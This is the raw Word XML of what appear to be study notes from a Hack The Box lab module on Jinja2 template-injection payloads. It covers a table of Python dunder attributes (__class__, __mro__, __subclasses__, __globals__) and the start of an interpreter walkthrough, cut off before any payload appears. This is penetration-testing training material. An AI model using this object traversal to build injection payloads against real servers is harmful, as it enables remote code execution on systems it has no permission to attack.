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A9D6FC" wp14:paraId="7F1D3605" wp14:textId="596C110F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2 </w:t>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads </w:t>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>structure</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="0D52CEB7" wp14:textId="2932626F">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Below is a small dictionary from </w:t>
      </w:r>
      <w:hyperlink r:id="Rc849aba0c57c4f80">
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>fatalerrors.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> to refer to when going over the Jinja2 payload development part of this section:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
      </w:tblGrid>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="059B3381">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="30627B96" w14:textId="0355FC8B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="6AD672C9" w14:textId="42D62DBC">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="3EED1677" w14:textId="2B87F549">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="12789A25">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="63ED4F2E" w14:textId="1319C4A3">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="1744F1E1" w14:textId="13B24C3F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>__class__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="4A5D9E19" w14:textId="0871C379">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>Returns the object (class) to which the type belongs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="4C33DB0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="0E36824E" w14:textId="597D34E7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="4B06B941" w14:textId="3414C6C0">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>__mro__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="25CF05E7" w14:textId="53115F35">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>Returns a tuple containing the base class inherited by the object. Methods are parsed in the order of tuples.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="06FBCD03">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="047810BA" w14:textId="3AF8A547">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="0C119F03" w14:textId="0B4FA2F9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>__subclasses__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="5739D78F" w14:textId="7FDB932D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>Each new class retains references to subclasses, and this method returns a list of references that are still available in the class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="349067DA">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="70AE3D72" w14:textId="2F2518C1">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="10880B00" w14:textId="705611F0">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>__builtins__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="02C1C442" w14:textId="20398D9A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>Returns the builtin methods included in a function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="2F8DABC6">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="29E1AE35" w14:textId="71327A5B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="79D1FED5" w14:textId="6A9FFCC5">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>__globals__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="43208B18" w14:textId="1ECFA249">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>A reference to a dictionary that contains global variables for a function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="6EE33F32">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="05F7CB9F" w14:textId="159FDAAA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>6.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="7BCE8ADE" w14:textId="155EEB9D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>__base__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="781B3D5F" w14:textId="59B28361">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>Returns the base class inherited by the object &lt;-- (__ base__ and __ mro__ are used to find the base class)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="17A9D6FC" w:rsidTr="17A9D6FC" w14:paraId="609942D3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="537B6201" w14:textId="7B3D6171">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>7.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="71912908" w14:textId="27029A97">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>__init__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="17A9D6FC" w:rsidP="17A9D6FC" w:rsidRDefault="17A9D6FC" w14:paraId="027D5559" w14:textId="77F4292A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="17A9D6FC">
              <w:rPr/>
              <w:t>Class initialization method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="5790FE66" wp14:textId="68568C1B">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Start by running Python on Pwnbox's or a local VM's terminal, then follow along.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1DA30A37" wp14:textId="316A868A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Python 3 Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="7D188DA3" wp14:textId="239CC23F">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3 Interpreter </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="4789A068" wp14:textId="709C34A6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ python3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3.9.2 (default, Feb 28 2021, 17:03:44) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[GCC 10.2.1 20210110] on linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Type "help", "copyright", "credits" or "license" for more information.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="450B0E33" wp14:textId="7C3DE52E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Create a string object and use type and __class__, as follows. Then use the dir() command to show all methods and attributes from the object.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="31436ACB" wp14:textId="2159010B">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68DDE9E1" wp14:textId="52588984">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&gt;&gt;&gt; import flask</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; s = 'HTB'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; type(s)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;class 'str'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; s.__class__</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;class 'str'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; dir(s)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
